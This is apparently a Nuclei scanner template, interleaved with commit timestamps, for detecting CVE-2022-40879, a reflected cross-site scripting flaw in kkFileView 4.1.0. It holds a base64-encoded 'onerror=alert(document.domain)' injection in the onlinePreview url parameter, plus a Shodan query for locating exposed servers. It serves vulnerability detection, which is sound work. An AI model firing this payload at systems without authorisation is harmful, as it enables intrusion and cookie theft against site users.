2022-10-25 09:53:25 +00:00
id : CVE-2022-40879
info :
name : kkFileView 4.1.0 - Cross-Site Scripting
2023-05-04 12:34:45 +00:00
author : arafatansari,co5mos
2022-10-25 09:53:25 +00:00
severity : medium
description : |
2022-12-13 20:36:48 +00:00
kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-10-25 09:53:25 +00:00
reference :
- https://github.com/kekingcn/kkFileView/issues/389
- https://nvd.nist.gov/vuln/detail/CVE-2022-40879
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2023-05-04 12:34:45 +00:00
cve-id : CVE-2022-40879
2022-10-25 09:53:25 +00:00
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:keking:kkfileview:*:*:*:*:*:*:*:*
epss-score : 0.00076
2022-10-25 09:53:25 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-10-25 09:53:25 +00:00
verified : true
2022-10-26 06:04:41 +00:00
shodan-query : http.html:"kkFileView"
2022-10-25 09:53:25 +00:00
tags : cve,cve2022,kkFileView,xss
2023-04-27 04:28:59 +00:00
http :
2022-10-25 09:53:25 +00:00
- method : GET
path :
2022-10-26 06:04:41 +00:00
- "{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="
2022-10-25 09:53:25 +00:00
matchers-condition : and
matchers :
- type : word
2022-10-26 06:04:41 +00:00
part : body
2022-10-25 09:53:25 +00:00
words :
2022-10-26 06:04:41 +00:00
- '<img src=1 onerror=alert(document.domain)>=PQ</p>'
- '该文件不'
condition : and
2022-10-25 09:53:25 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-12-13 20:36:48 +00:00
# Enhanced by md on 2022/12/13